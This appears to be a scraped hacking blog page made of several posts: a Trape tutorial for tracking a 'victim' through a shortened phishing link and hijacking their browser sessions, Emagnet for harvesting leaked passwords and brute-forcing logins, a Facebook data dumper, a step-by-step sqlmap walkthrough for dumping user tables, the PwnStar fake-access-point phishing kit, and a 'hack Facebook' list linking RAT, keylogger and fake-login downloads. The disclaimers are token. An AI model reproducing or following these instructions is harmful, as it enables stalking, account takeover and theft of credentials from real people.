Nexus: kali linux

Track a Cellphone Without The IP Address Using Trape Tool - Kali Linux

Read

Track a Cellphone Without The IP Address Using Trape Tool - Kali Linux
The most important topic to discuss for them who lost their cellphone and searching the web for the solution to track the phone.

Second, if someone bullying you then it's become very very important to track him down.

Rex, one of my friends, one day got a call from an unknown number a man spoke to him with very bad language.

He tried to track the phone number but he failed because the service providers do not allow us to do that.

If they don't, then How can we track a cell phone with our own? This question often comes in our mind when we go to track someone down.

But we forget one thing, i.e. nowadays every single person uses the internet on their mobile. We can track them through the Internet.

Here, we are going to discuss the way using which we can track any cell phone easily using a simple tool and a little social engineering trick. All you need is Kali Linux Installed in your system and an active Internet connection.

The tool we're gonna use here is called Trape. Before begining the tutorial let's know a little about it.
A Little About Trape Tool

Trape is a Github script written in python. Using Trape we can generate a tracking URL for the victim. If the victim enters the URL, we will get the IP logs in Trape's control panel.

Basically, the tool performs browser hooking. Once the victim trapped, we can capture credentials, important details, etc. We can get the real-time location too if the GPS is turned on.

Also, we can check the login sessions of the browsers that the victim used. The tool recognizes facebook, twitter, VK, Reddit, Gmail, Github, etc. popular sessions.

Let's get to the tutorial.

Configure Trape in Kali Linux
Fire up your Kali Linux machine and open up the terminal.
Clone or download the tool from here. To clone it, use the commands-

cd Desktop/
git clone https://github.com/jofpin/trape.git

It will download the tool on the desktop. You can change the directory to your own choice.
Now go to the downloaded folder by the commands-

cd Desktop
ls
cd Trape/
ls
Step 1: Install The requirements
Here, you will see a text file named requirements.txt. This file is needed to install some necessary packages and library files to run Trape properly.

Now proceed to install the requirements, run the file by the command-

pip install -r requirements.txt

This command will install all the necessary packages and subfolders automatically. But it's not a thing to worry about. Trape will install the requirements on its own but this step will help to speed up the installation process.

Step 2: Load The Tool in The terminal
Now, run the command python trape.py -h to see how to use the tool.

Here it shows the command python trape.py -u <> -p <>. We can use this command to run the tool.

Now let us demonstrate how we can use the tool.

In the command, we are using the URL https://google.com and the Port 8080 as an example. So our command will look like-

python trape.py -u https://google.com -p 8080

(Note: You can take any URL and a Port number you want to use in the command. If you take https://facebook.com in the URL, the browser hooking phishing page will look like the Facebook login page.)

Now type the command and hit enter. The tool will be loaded successfully.

Here our Trape tool is running. Here we got two links and one access key. The first link is to trape the victim, the second is the control panel link and the access key is to access the control panel.

Step 3: Resolve the problems with the IP address
All are okay but there is a problem. The link for the victim looks suspicious and if the victim is clever, he's not gonna get trapped.

But there is a solution. Shorten the link using Bitly URL shortener.

Ahha! now, all okay. Send the shortened link to the victim and wait for the victim to fall in the trape.

Note down this point- The IP address 127.0.0.1 which used in the generated link is a local IP address and it will not work outside the local network. It will only work on the devices connected to the same local network.

But don't worry. Ngrok tool can help us in this situation.
Access localhost over WAN Using Ngrok
Download Ngrok from here. It will be downloaded as a zip file. Extract it on the desktop and copy the Ngrok executable file from the extracted folder to the Desktop.

Now open up the terminal and change the directory to Desktop by the command-
cd Desktop/
ls
Now you need to change the permission of Ngrok script. To do that type the command-

chmod +x ngrok

In this step, move the ngrok script to bin folder by the command-

mv ngrok /usr/bin

Now clear the terminal and simply type the command ngrok http 8080 and hit enter.

Here in the 8080 section, you can choose and forward any port number.

Now you can see our 8080 port is online!

configure ngrok in Kali Linux

Okay, in the end, our problem with the localhost URL has been solved. Thanks to Ngrok. We can use the ngrok.io URL instead of the localhost.

Step 4: Login To The Control Panel And Manage the Trapped
Now, copy the control panel link and paste & search in a browser.

And copy the access key from the terminal and paste it to the login page. You will be logged in to the Control Panel Dashboard. Here you can manage the trapped victims.

If someone clicks the link you will get his log in the Dashboard. To test the tool we opened it on another computer and we got the IP log.

Now, look at what you can collect from the trapped IP addresses. Click on 'DETAILS' at the right. You will get the real-time location and the logged-in sessions in the browser.

But the location depends on GPS. If the GPS of the victim is turned on, you will get a real-time location. Also, you will get the details of the device, about the CPU, Operating System, Browser, ISP Name. These details are enough to track someone down.

If the sessions are active then the OFFLINE will become ONLINE. If it comes online click on the session icon to see and use it.

One thing to note down. You can use the trapping link on many people.
Conclusion:

We should stop cyberbullies as much as we can. But we can't stay safe every time. In this case, tools like Trape comes into use.
Playing with someone's feelings is not a good thing but that's what cyberbullies do. It's not nice mainly for a teenager.
If you liked the tutorial let us know and if you have any problem with the installation or use of this tool feel free to comment us below describing your problem. Stay safe and have a joyful hacking journey.

Disclaimer:

We do not promote any illegal activity on our blog. Perform it on others at your own risk. We are not responsible for any kind of damage caused by you. It is recommended to use it legally and stay safe. Use it only when you need it for good work. Ethical Hacking doesn't mean applying it to anyone without any legal reason. To do practice use your own property or if you want to use other's take written permission from them.

Read More Add comment

EMAGNET - The Best Tool To Find 97.1% Accurate Leaked Database

By 0x000216

Read

0 Comments

EMAGNET - The Best Tool To Find 97.1% Accurate Leaked Database

The world runs on information.

Information keeps us safe and information destroys us. If we talk about the online world, there is a lot of information stored. And if we talk about ethical hacking, information gathering is the first phase of the process of any hacking attack.

Sometimes on some websites, we get to see recently leaked databases of email accounts and passwords. Some of them can be useful for hackers.

Here, we are going to tell you about a tool called Emagnet. It searches for recently leaked databases on the Pastebin website.

Why do you need such types of tools?

Even if you are told about a website specifically where you can find leaked databases, it is hard to find which one is recently uploaded or which one is most accurate.

Emagnet doesn't search for leaked databases on Pastebin, it searches for the most recent databases with a high accuracy rate.

Let's see if this tool really does worth.
Configuring EMAGNET on Kali Linux
Fire up your Kali Linux machine and download the tool from Github. Now navigate to the directory where you've downloaded the tool and open up it on the terminal and expand it.

cd git clone https://github.com/wuseman/EMAGNET.git
cd EMAGNET
ls

Now you need to run the bash script named 'emagnet' but in order to run it, first, you have to give root permission to it. Just follow the commands.

chmod +x emagnet
./emagnet

We have successfully configured the tool. Now we can use it. In order to use it, we can see what arguments we have to use to run different modules. Just run the command given below to view the 'help' section.

./emagnet -h

Here, the help menu showing a lot of options we can use. The option for brute-forcing different services is really looking cool. To use it just add the '-g' argument with 'emagnet' just like below and add the service available right now on Emagnet.

On the video, on the left side, you are seeing the tool and on the right side what's going on inside the tool.

./emagnet -g spotify

To brute-force a service login, Emagnet first downloads the most recent leaked database with a high accuracy rate and starts brute-forcing automatically its own. To download all most recent leaked databases at once, simply give the command-

./emagnet --emagnet

All filtered E-mail addresses and passwords get stored on the log dir.

Warning: You will get leaked databases only if there is most recent and highly accurate databases are available on Pastebin.
Issues and Updates you're going to get
As Emagnet is a new tool and it is still in development, you may face some issues with it. The developer wuseman is still working on it and trying to add new features to it and removing the issues and old features from it.

The highlighted upcoming feature you will get in the future is the 'Search' section, where you can search for specific targets and databases according to your requirements. you can access the preview using the command-

./emagnet -S

Conclusion
Wuseman, the developer of the tool says "Emagnet is No. 1 tool for fetch these leaks from Pastebin". We believe that. Nothing comes completely perfect we have to work on it to make it perfect. It has some issues but someday it will be a No. 1 tool to search leaked databases on Pastebin.

Disclaimer

The tutorial you found on this website is only for educational purposes. Misuse of this information can lead you to jail or punishment. Anything you damage, we are not responsible for that. Do use it on your own property. If you want to test it on other's property, take written permission from them.

Read More Add comment

How To Extract All Sensitive Information From A Facebook Profile

By 0x000216

Read

0 Comments

How To Extract All Sensitive Information From A Facebook Profile

Nowadays we have more information stored online than the offline world. Mainly on social media platforms, we share our daily routines and sensitive information to the public unknowingly.

A BlackHat always looks for such types of information sources. Using that information in the right way a BlackHat can manipulate us.

As we talk about protecting ourselves on this blog, not to be the victim, we are going to share a tool with you that can extract targeted information from facebook.

FBI. Such a creepy name! This tool can be used to dump phone numbers, email addresses from Facebook. You can extract information from all your Facebook friends at once too.

Why you should use the FBI tool?

This tool is very lite and comes with a clean interface. You don't need to fight with any complexity.

Let's see how we can take this tool in use.
Configuring FBI tool on Kali Linux
Fire up your Kali Linux machine and download the tool from Github. Now navigate to the directory where you've downloaded the tool and expand the directory.

Here you will see a python script named 'fbi.py' which will be used to launch the tool but before proceeding to that we have to satisfy some requirements. Run the 'requirements.txt' file by using the command given below.

pip install -r requirements.txt

Now you are ready to launch the FBI. Launch the python script. Just launch the 'fbi.py' script using the command given below.

python fbi.py

Now here, type 'help' to see the options we can use.

Before dumping the information we need to connect our Facebook account(not recommended to use your primary Facebook account) with the tool. To do that type 'token' on the terminal to generate the access token as seen on the screenshot given below.

Okay. We have successfully generated the access token and now its time to extract some information.

Here we go! we collected two emails from one of our Facebook friends.
Conclusion
Information is everything. If we have the right information we can win a country we can lose a country. Information is the most powerful thing in this world. You just need to collect the right information and apply it to the right target.

What do you think? let us know in the comment box below. Also, don't forget to upvote if you liked this discussion.
Disclaimer

The tutorial you found on this website is only for educational purposes. Misuse of this information can lead you to jail or punishment. Anything you damage, we are not responsible for that. Do use it on your own property. If you want to test it on other's property, take written permission from them.

Read More Add comment

Raccoon - A High Performance Offensive Security Tool For Reconnaissance And Vulnerability Scanning

By 0x000216

Read

0 Comments

Offensive Security Tool for Reconnaissance and Information Gathering.

Features

DNS details
DNS visual mapping using DNS dumpster
WHOIS information
TLS Data - supported ciphers, TLS versions, certificate details, and SANs
Port Scan
Services and scripts scan
URL fuzzing and dir/file detection
Subdomain enumeration - uses Google Dorking, DNS dumpster queries, SAN discovery, and brute-force
Web application data retrieval:
- CMS detection
- Web server info and X-Powered-By
- robots.txt and sitemap extraction
- Cookie inspection
- Extracts all fuzzable URLs
- Discovers HTML forms
- Retrieves all Email addresses
Detects known WAFs
Supports anonymous routing through Tor/Proxies
Uses asyncio for improved performance
Saves output to files - separates targets by folders and modules by files

Roadmap and TODOs

Support multiple hosts (read from the file)
Rate limit evasion
OWASP vulnerabilities scan (RFI, RCE, XSS, SQLi etc.)
SearchSploit lookup on results
IP ranges support
CIDR notation support
More output formats

About
A raccoon is a tool made for reconnaissance and information gathering with an emphasis on simplicity.
It will do everything from fetching DNS records, retrieving WHOIS information, obtaining TLS data, detecting WAF presence and up to threaded dir busting and subdomain enumeration. Every scan outputs to a corresponding file.
As most of Raccoon's scans are independent and do not rely on each other's results, it utilizes Python's asyncio to run most scans asynchronously.
Raccoon supports Tor/proxy for anonymous routing. It uses default wordlists (for URL fuzzing and subdomain discovery) from the amazing SecLists repository but different lists can be passed as arguments.
For more options - see "Usage".

Installation
For the latest stable version:

pip install raccoon-scanner

Or clone the GitHub repository for the latest features and changes:

git clone https://github.com/evyatarmeged/Raccoon.git
cd Raccoon
python raccoon_src/main.py

Prerequisites
Raccoon uses Nmap to scan ports as well as utilizes some other Nmap scripts and features. It is mandatory that you have it installed before running Raccoon.
OpenSSL is also used for TLS/SSL scans and should be installed as well.

Usage

Usage: raccoon [OPTIONS]

Options:
  --version                      Show the version and exit.
  -t, --target TEXT              Target to scan  [required]
  -d, --dns-records TEXT         Comma separated DNS records to query.
                                 Defaults to: A,MX,NS,CNAME,SOA,TXT
  --tor-routing                  Route HTTP traffic through Tor (uses port
                                 9050). Slows total runtime significantly
  --proxy-list TEXT              Path to proxy list file that would be used
                                 for routing HTTP traffic. A proxy from the
                                 list will be chosen at random for each
                                 request. Slows total runtime
  --proxy TEXT                   Proxy address to route HTTP traffic through.
                                 Slows total runtime
  -w, --wordlist TEXT            Path to wordlist that would be used for URL
                                 fuzzing
  -T, --threads INTEGER          Number of threads to use for URL
                                 Fuzzing/Subdomain enumeration. Default: 25
  --ignored-response-codes TEXT  Comma separated list of HTTP status code to
                                 ignore for fuzzing. Defaults to:
                                 302,400,401,402,403,404,503,504
  --subdomain-list TEXT          Path to subdomain list file that would be
                                 used for enumeration
  -S, --scripts                  Run Nmap scan with -sC flag
  -s, --services                 Run Nmap scan with -sV flag
  -f, --full-scan                Run Nmap scan with both -sV and -sC
  -p, --port TEXT                Use this port range for Nmap scan instead of
                                 the default
  --tls-port INTEGER             Use this port for TLS queries. Default: 443
  --skip-health-check            Do not test for target host availability
  -fr, --follow-redirects        Follow redirects when fuzzing. Default: True
  --no-url-fuzzing               Do not fuzz URLs
  --no-sub-enum                  Do not bruteforce subdomains
  -q, --quiet                    Do not output to stdout
  -o, --outdir TEXT              Directory destination for scan output
  --help                         Show this message and exit.

Screenshots

HTB challenge example scan:

Results folder tree after a scan:

Download Raccoon

Read More Add comment

Kali Linux 2018.3 Release - Penetration Testing and Ethical Hacking Linux Distribution

By 0x000216

Read

0 Comments

Read More Add comment

An Unicode Domain Phishing Generator for IDN Homograph Attack - EvilURL v2.0

By 0x000216

Read

0 Comments

Read More Add comment

Kali Linux NetHunter - Android penetration testing platform

By 0x000216

Read

0 Comments

Read More Add comment

SQLmap (Introduction+Usage)

By 0x000216

Read

0 Comments

Sqlmap

Sqlmap is one of the most popular and powerful sql injection automation tool out there. Given a vulnerable http request url, sqlmap can exploit the remote database and do a lot of hacking like extracting database names, tables, columns, all the data in the tables etc. It can even read and write files on the remote file system under certain conditions. Written in python it is one of the most powerful hacking tools out there. Sqlmap is the metasploit of sql injections. In this post you will have Download Link of sqlmap as well as the video to help you how to use and under the video you will have a brief tutorial about the usuage of SQLMAP..

Download Link: http://adf.ly/qOGkX

Video :

Vulnerable Urls

Lets say there is a web application or website that has a url in it like this

http://www.site.com/section.php?id=51

and it is prone to sql injection because the developer of that site did not properly escape the parameter id. This can be simply tested by trying to open the url

http://www.site.com/section.php?id=51'

We just added a single quote in the parameter. If this url throws an error or reacts in an unexpected manner then it is clear that the database has got the unexpected single quote which the application did not escape properly. So in this case this input parameter "id" is vulnerable to sql injection.

Hacking with sqlmap

Now its time to move on to sqlmap to hack such urls. The sqlmap command is run from the terminal with the python interpreter.

python sqlmap.py -u "http://www.site.com/section.php?id=51"

The above is the first and most simple command to run with the sqlmap tool. It checks the input parameters to find if they are vulnerable to sql injection or not. For this sqlmap sends different kinds of sql injection payloads to the input parameter and checks the output. In the process sqlmap is also able to identify the remote system os, database name and version. Here is how the output might look like

[*] starting at 12:10:33

[12:10:33] [INFO] resuming back-end DBMS 'mysql' 
[12:10:34] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*).Other texts.......)
---
[12:10:37] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5

So the sqlmap tool has discovered the operating system, web server and 
database along with version information. Even this much is pretty 
impressive. But its time to move on and see what more is this tool 
capable of.

Discover Databases

Once sqlmap confirms that a remote url is vulnerable to sql injection and is exploitable the next step is to find out the names of the databases that exist on the remote system. The "--dbs" option is used to get the database list.

$ python sqlmap.py -u "http://www.sitemap.com/section.php?id=51" --dbs

The output could be something like this

[*] starting at 12:12:56

[12:12:56] [INFO] resuming back-end DBMS 'mysql' 
[12:12:57] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*)./.......Other Texts.....)
---
[12:13:00] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[12:13:00] [INFO] fetching database names
[12:13:00] [INFO] the SQL query used returns 2 entries
[12:13:00] [INFO] resumed: information_schema
[12:13:00] [INFO] resumed: safecosmetics
available databases [2]:
[*] information_schema
[*] safecosmetics

The output shows the existing databases on the remote system

Find tables in a particular database

Now its time to find out what tables exist in a particular database. Lets say the database of interest over here is 'safecosmetics'
Command

$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --tables -D safecosmetics

and the output can be something similar to this

[11:55:18] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[11:55:18] [INFO] fetching tables for database: 'safecosmetics'
[11:55:19] [INFO] heuristics detected web page charset 'ascii'
[11:55:19] [INFO] the SQL query used returns 216 entries
[11:55:20] [INFO] retrieved: acl_acl
[11:55:21] [INFO] retrieved: acl_acl_sections                                                                                
........... more tables

Get columns of a table

Now that we have the list of tables with us, it would be a good idea to get the columns of some important table. Lets say the table is 'users' and it contains the username and password.

$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --columns -D safecosmetics -T users

The output can be something like this

[12:17:39] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[12:17:39] [INFO] fetching columns for table 'users' in database 'safecosmetics'
[12:17:41] [INFO] heuristics detected web page charset 'ascii'
[12:17:41] [INFO] the SQL query used returns 8 entries
[12:17:42] [INFO] retrieved: id
[12:17:43] [INFO] retrieved: int(11)                                                                                         
[12:17:45] [INFO] retrieved: name                                                                                            
[12:17:46] [INFO] retrieved: text                                                                                            
[12:17:47] [INFO] retrieved: password                                                                                        
[12:17:48] [INFO] retrieved: text                                                                                            

.......

[12:17:59] [INFO] retrieved: hash
[12:18:01] [INFO] retrieved: varchar(128)
Database: safecosmetics
Table: users
[8 columns]
+-------------------+--------------+
| Column            | Type         |
+-------------------+--------------+
| email             | text         |
| hash              | varchar(128) |
| id                | int(11)      |
| name              | text         |
| password          | text         |
| permission        | tinyint(4)   |
| system_allow_only | text         |
| system_home       | text         |
+-------------------+--------------+

Get data from a table

Now comes the most interesting part, of extracting the data from the table. The command would be

$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --dump -D safecosmetics -T users

The above command will simply dump the data of the particular table, very much like the mysqldump command.

The hash column seems to have the password hash. Try cracking the hash and then you would get the login details rightaway. sqlmap will create a csv file containing the dump data for easy analysis.
So far we have been able to collect a lot of information from the remote database using sqlmap. Its almost like having direct access to remote database through a client like phpmyadmin. In real scenarios hackers would try to gain a higher level to access to the system. For this, they would try to crack the password hashes and try to login through the admin panel. Or they would try to get an os shell using sqlmap.
I wrote another post on using sqlmap to get more details about remote databases. It explains the other options of sqlmap that are useful to find the out the database users, their privileges and their password hashes.

Read More Add comment

New E-Books

By 0x000216

Read

0 Comments

Read More Add comment

PwnStar - Script for multi attack (for all your fake-AP needs!)

By 0x000216

Read

0 Comments

A bash script to launch a Soft AP, configurable with a wide variety of attack options. Includes a number of index.html and server php scripts, for sniffing/phishing. Can act as multi-client captive portal using php and iptables. Launches classic exploits such as evil-PDF. De-auth with aireplay, airdrop-ng or MDK3.

Usage

Basic Menu

1) Honeypot: get the victim onto your AP, then use nmap, metasploit etc
             no internet access given

2) Grab WPA handshake

3) Sniffing: provide internet access, then be MITM

4) Simple web server with dnsspoof: redirect the victim to your webpage

5) Karmetasploit

6) Browser_autopwn

1) Relies on auto-connections ie the device connnects without the owner being aware. You can then attempt to exploit it. Target the fake-AP ESSID to something the device has likely connected to previously eg Starbucks WiFi

2) Sometimes it is quicker to steal the handshake than sniff it passively. Set up the AP with the same name and channel as the target, and then DOS the target. Airbase will save a pcap containing the handshake to /root/PwnSTAR-n.cap.

3) Provides an open network, so you can sniff the victim's activities.

4) Uses apache to serve a webpage. There is an option to load your own page eg one you have cloned. The provided page (hotspot_3) asks for email details. Note the client is forced to the page by DNS spoofing. They can only proceed to the internet if you manually stop dnsspoof. DNS-caching in the client is a problem with this technique. The captive portal in the advanced menu is a much better way of hosting hotspot_3

5&6) Provides all the config files to properly set-up Karmetasploit and Browser_autopwn.

Advanced Menu

a) Captive portals (phish/sniff)

b) Captive portal + PDF exploit (targets Adobe Reader < v9.3)

c) MSXML 0day (CVE-2012-1889: MSXML Uninitialized Memory Corruption)

d) Java_jre17_jmxbean

e) Choose another browser exploit

a) Uses iptables rules to route the clients. This is a fully functioning captive portal, and can track and block/allow multiple connections simultaneously. Avoids the problems of dns-spoofing. There are two built-in web options:

1) Serves hotspot3. Does not allow clients onto the internet until credentials have been given.

2) Allows you to add a personal header to the index.php. You could probably copy the php functions from this page onto a cloned page, and load that instead.

b) A captive portal which blocks the client until they have downloaded a pdf. This contains a malicious java applet. Includes a virgin pdf to which you can add your own payload.

c&d) Launches a couple of example browser exploits

e) Gives a skeleton framework for loading any browser exploit of your choice. Edit PwnSTAR browser_exploit_fn directly for more control.

Download PwnStar

Read More Add comment

Kali Linux 1.0.7 Released

By 0x000216

Read

0 Comments

Kernel 3.14, Tool Updates, Package Improvements

Kali linux 1.0.7 has just been released, complete with a whole bunch of tool updates, a new kernel, and some cool new features. Check out our changelog for a full list of these items. As usual, you don’t need to re-download or re-install Kali to benefit from these updates – you can update to the latest and greatest using these simple commands:

apt-get update
apt-get dist-upgrade
# If you've just updated your kernel, then:
reboot

Kali Linux Encrypted USB Persistence

One of the new sought out features introduced (which is also partially responsible for the kernel update) is the ability to create Kali Linux Live USB with LUKS Encrypted Persistence. This feature ushers in a new era of secure Kali Linux USB portability, allowing us to either boot to a “clean” Kali image or alternatively, overlay it with the contents of a persistent encrypted partition, all within the same USB drive.

Tool Developers Ahoy!

This release also marks the beginning of some co-ordinated efforts between Kali developers and tool developers to make sure their tools are represented correctly and are fully functional within Kali Linux. We would like to thank the metasploit, w3af, and wpscan dev teams for working with us to perfect their Kali packages and hope that more tool developers join in. Tool developers are welcome to send us an email to

and we’ll be happy to work with you to better integrate your tool into Kali.

Kali Linux: Greater Than the Sum of its Parts

For quite some time now, we’ve been preaching that Kali Linux is more than a “Linux distribution with a collection of tools in it”. We invest a significant of time and resources developing and enabling features in the distribution which we think are useful for penetration testers and other security professionals. These features range from things like “live-build“, which allows our end users to easily customize their own Kali ISOs to features like Live USB persistence encryption, which provides paranoid users with an extra layer of security. Many of these features are unique to Kali and can be found nowhere else. We’ve started tallying these features and linking them from our Kali documentation page – check it out, it’s growing to be an impressive list!

Torrents, Virtual Machine & ARM images

In the next few days, Offensive Security will post Virtual Machine and custom ARM images for the 1.0.7 release. We will announce the availability of these images via our blogs and Twitter feeds, so stay tuned!.

Source

Read More Add comment

Methods To Hack Facebook (Only For Educational Purpose)

By 0x000216

Read

0 Comments

This is only for educational purpose. Do at your own risk

This is how we can hack Facebook ID'. Hope you enjoy and Learn a lot......
How To Hack Facebook Account 2013
1 - Android Remote Administrator Tool - A RAT is also a shortcut called Remote Administrator Tool. It is mostly used for malicious purposes, such as controlling Android Phones, stealing victims data, deleting or editing some files. You can only infect someone by sending him file called Server and they need to click it.
Here More Information - http://www.hackforums.net/showthread.php?tid=3529624

-----------------------------------------------------------------

2- Remote Administrator Tool - A remote access Trojan (RAT) is a malware program that includes a back door for administrative control over the target computer. RATs are usually downloaded invisibly with a user-requested program -- such as a game -- or sent as an email attachment. Once the host system is compromised, the intruder may use it to distribute RATs to other vulnerable computers and establish a bot-net. RATs can be difficult to detect because they usually don't show up in lists of running programs or tasks. The actions they perform can be similar to those of legitimate programs. Furthermore, an intruder will often manage the level of resource use so that a drop in performance doesn't alert the user that something's amiss.
How To Create RAT - http://blackhatcrackers.blogspot.in/2013/01/remote-administration-tools.html

You Tube Link - http://www.youtube.com/watch?v=3i5vEbnK5xk
Download Link -http://www.2shared.com/file/A1QNxuHf/CybergateRAT1075.html

Download Link 2 Official Website - http://www.cyber-software.org/site/

Pdf Version -www.eset.com/us/resources/manuals/ERA_Basic_Setup_Guide.pdf

-----------------------------------------------------------------

3- Key-logger - Key-loggers are programs which record each keystroke on the computer they are installed on. This provides a complete log of text entered such as passwords, emails sent and websites visited. This log can then be automatically sent over a remote connection without the person using the computer necessarily knowing about it. Because of this, key-loggers are typically associated with malicious software and they will usually be picked up and removed by virus scanners. However, there are also key-loggers which are commercially available for home or office use. In this way, key-loggers have a distinct set of purposes which make them very useful in certain situations.
How To Create Keylogger -http://blackhatcrackers.blogspot.in/2013/01/keylogger-attack.html

You Tube Link - http://www.youtube.com/watch?v=RusJJjai7BI
Download Keylogger - http://project-neptune.net/download/

Pdf Version -www.cs.columbia.edu/~mikepo/papers/gpukeylogger.eurosec13.pdf

-----------------------------------------------------------------

4- Phishing - In computing, phishing is a form of criminal activity using social engineering techniques. Phishers attempt to fraudulently acquire sensitive information, such as passwords and credit card details, by masquerading as a trustworthy person or business in an electronic communication. Phishing is typically carried out using email or an instant message, although phone contact has been used as well. Attempts to deal with the growing number of reported phishing incidents include legislation, user training, and technical measures.
How To Create Facebook Fake Login Page -http://blackhatcrackers.blogspot.in/2013/01/phishing-attack.html

You Tube Link - https://www.youtube.com/watch?v=QE-kmk3vU1U
Download fake Login Page -http://www.mediafire.com/download/jjd5nojzyjz/Facebook+fake+page%28Hackingaday%29.rar

Pdf Version - www.fireeye.com/resources/pdfs/fireeye-top-spear-phishing-words.pdf

-----------------------------------------------------------------

5- Click-Jacking - Clickjacking, also known as a "UI redress attack", is when an attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on another page when they were intending to click on the the top level page. Thus, the attacker is "hijacking" clicks meant for their page and routing them to other another page, most likely owned by another application, domain, or both. Using a similar technique, keystrokes can also be hijacked. With a carefully crafted combination of stylesheets, iframes, and text boxes, a user can be led to believe they are typing in the password to their email or bank account, but are instead typing into an invisible frame controlled by the attacker.
What Is Clickjacking ? How It's Work ? -http://blackhatcrackers.blogspot.in/2013/01/clickjacking.html

You Tube Link - https://www.youtube.com/watch?v=IqN5HyqUJ2A&feature=player_embedded
Advanced Tutorial ClickJacking - http://javascript.info/tutorial/clickjacking

Pdf Version - seclab.stanford.edu/websec/framebusting/framebust.pdf

-----------------------------------------------------------------

6- Tabnabbing - Tabnabbing is a computer exploit and phishing attack, which persuades users to submit their login details and passwords to popular websites by impersonating those sites and convincing the user that the site is genuine. The attack's name was coined in early 2010 by Aza Raskin, a security researcher and design expert. The attack takes advantage of user trust and inattention to detail in regard to tabs, and the ability of modern web pages to rewrite tabs and their contents a long time after the page is loaded. Tabnabbing operates in reverse of most phishing attacks in that it doesn’t ask users to click on an obfuscated link but instead loads a fake page in one of the open tabs in your browser.
What Is TabNabbing ? How It's Work -http://blackhatcrackers.blogspot.in/2013/01/tabnabbing.html

You Tube Link - https://www.youtube.com/watch?v=Njrv03jSLLM
TabNabbing In Backtrack 5 - https://www.youtube.com/watch?v=xFo0vvq3R3g
Pdf Version -https://lirias.kuleuven.be/bitstream/123456789/400475/1/p447.pdf

----------------------------------------------------------------

7- Session Hijacking - The Session Hijacking attack consists of the exploitation of the web session control mechanism, which is normally managed for a session token. Because http communication uses many different TCP connections, the web server needs a method to recognize every user’s connections. The most useful method depends on a token that the Web Server sends to the client browser after a successful client authentication. A session token is normally composed of a string of variable width and it could be used in different ways, like in the URL, in the header of the http requisition as a cookie, in other parts of the header of the http request, or yet in the body of the http requisition. The Session Hijacking attack compromises the session token by stealing or predicting a valid session token to gain unauthorized access to the Web Server.
What Is Session Hijacking ? How It's Work ? -http://blackhatcrackers.blogspot.in/2013/01/session-hijacking-attack.html

You Tube Link - http://www.youtube.com/watch?v=YuERGiQ0naI
Pdf Version - www.dtic.mil/dtic/tr/fulltext/u2/a422361.pdf

-----------------------------------------------------------------

8- Side Jacking Using Fire Sheep - HTTP session hijacking, better known as “sidejacking”, poses a major threat to all internet users. This is due to the common use of Wi-Fi networks, which are inherently unsecure, but also because of the wide-spread misplaced trust in the safety of internet use on phones and perceived secure connections. It has been demonstrated that wired networks are also not necessarily safe from sidejacking attempts and even your interactions in an App store can be at risk as well.
If you are logging into Facebook using the open Wi-Fi network at your local watering hole, an individual with a simple tool such as Firesheep can gain access to your account, change your password, and then potentially take advantage of other programs linked to that account. These sidejacking attacks can be done without any programming knowledge and the problem isn’t simply limited to the unencrypted Wi-Fi networks we are familiar with. Firesheep can be used to intercept information sent over any unencrypted HTTP session, whether it is wired or wireless. And what can a Sidejacker do with my connection to an App store, you may wonder? Great question! Elie Bursztein at Google cites the various ways your App browsing and buying can be compromised. It can be everything from password stealing to App swapping, when an attacker’s malware App is downloaded instead of the actual App that was paid for.The industry is slowly starting to adapt the practice of always on SSL to protect users, including in App stores. The implementation of always on SSL, or end-to-end encryption using HTTPS, is a great place to start. It is natural to visit a website and feel secure because you have logged in to your account with a unique username and password, but the problem is that if the rest of the traffic is not encrypted, a Sidejacker can gain access to the vulnerable cookie and then manipulate any personal information within the account. However, when a website is secured with HTTPS from the time of first access to the time you leave, the entire session is encrypted in a way that prevents your information from being compromised.
What Is SideJacking Using FireSheep ? - http://www.hacking-tutorial.com/hacking-tutorial/firesheep-http-session-hijacking-tools/

You Tube Link - http://www.youtube.com/watch?v=8qmTVPO2jvI

-----------------------------------------------------------------

9 - ARP Poisoning - Address Resolution Protocol (ARP) poisoning is a type of attack where the Media Access Control (MAC) address is changed by the attacker. Also, called an ARP spoofing attacks, it is effective against both wired and wireless local networks. Some of the things an attacker could perform from ARP poisoning attacks include stealing data from the compromised computers, eavesdrop using man-in-the middle methods, and prevent legitimate access to services, such as Internet service.
A MAC address is a unique identifier for network nodes, such as computers, printers, and other devices on a LAN. MAC addresses are associated to network adapter that connects devices to networks. The MAC address is critical to locating networked hardware devices because it ensures that data packets go to the correct place. ARP tables, or cache, are used to correlate network devices’ IP addresses to their MAC addresses.In for a device to be able to communicate with another device with a known IP Address but an unknown MAC address the sender sends out an ARP packet to all computers on the network. The ARP packet requests the MAC address from the intended recipient with the known IP address. When the sender receives the correct MAC address then is able to send data to the correct location and the IP address and corresponding MAC address are store in the ARP table for later use.
ARP poisoning is when an attacker is able to compromise the ARP table and changes the MAC address so that the IP address points to another machine. If the attacker makes the compromised device’s IP address point to his own MAC address then he would be able to steal the information, or simply eavesdrop and forward on communications meant for the victim. Additionally, if the attacker changed the MAC address of the device that is used to connect the network to Internet then he could effectively disable access to the web and other external networks.
What Is ARP Poisoning How It's Work -http://www.mediafire.com/download/47bybhe5gd5de50/Compromising+Facebook+Account+Via+ARP+Poisoning.pdf

ARP Poisoning Advanced tutorial -http://openmaniak.com/ettercap_arp.php

You Tube Link - https://www.youtube.com/watch?v=zC4PVbcGLmU
